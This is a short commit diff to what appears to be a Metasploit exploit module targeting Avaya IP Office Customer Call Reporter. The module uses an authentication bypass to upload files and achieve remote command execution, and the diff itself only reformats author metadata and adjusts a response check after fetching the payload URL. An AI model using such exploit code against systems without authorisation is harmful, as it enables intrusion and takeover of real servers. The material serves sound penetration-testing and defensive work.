metadata formatting, and a little res gotcha

unstable
sinn3r 2012-10-08 15:00:51 -05:00
parent cdf8956a10
commit abb4bdd408
1 changed files with 7 additions and 6 deletions

View File

@ -16,7 +16,7 @@ class Metasploit3 < Msf::Exploit::Remote
def initialize def initialize
super( super(
'Name' => 'Avaya IP Office Customer Call Reporter ImageUpload.ashx Remote Command Execution', 'Name' => 'Avaya IP Office Customer Call Reporter ImageUpload.ashx Remote Command Execution',
'Description' => %q{ 'Description' => %q{
This module exploits an authentication bypass vulnerability on Avaya IP Office This module exploits an authentication bypass vulnerability on Avaya IP Office
Customer Call Reporter, which allows a remote user to upload arbitrary files Customer Call Reporter, which allows a remote user to upload arbitrary files
@ -24,10 +24,11 @@ class Metasploit3 < Msf::Exploit::Remote
arbitrary ASP .NET code. The vulnerability has been tested successfully on Avaya IP arbitrary ASP .NET code. The vulnerability has been tested successfully on Avaya IP
Office Customer Call Reporter 7.0.4.2 and 8.0.8.15 on Windows 2003 SP2. Office Customer Call Reporter 7.0.4.2 and 8.0.8.15 on Windows 2003 SP2.
}, },
'Author' => [ 'Author' =>
'rgod <rgod[at]autistici.org>', # Vulnerability discovery [
'juan vazquez' # Metasploit module 'rgod <rgod[at]autistici.org>', # Vulnerability discovery
], 'juan vazquez' # Metasploit module
],
'Platform' => 'win', 'Platform' => 'win',
'References' => 'References' =>
[ [
@ -173,7 +174,7 @@ class Metasploit3 < Msf::Exploit::Remote
'method' => 'GET' 'method' => 'GET'
}, 20) }, 20)
if (!res or res.code != 200) if (!res or (res and res.code != 200))
print_error("#{@peer} - Execution failed on #{payload_url} [No Response]") print_error("#{@peer} - Execution failed on #{payload_url} [No Response]")
return return
end end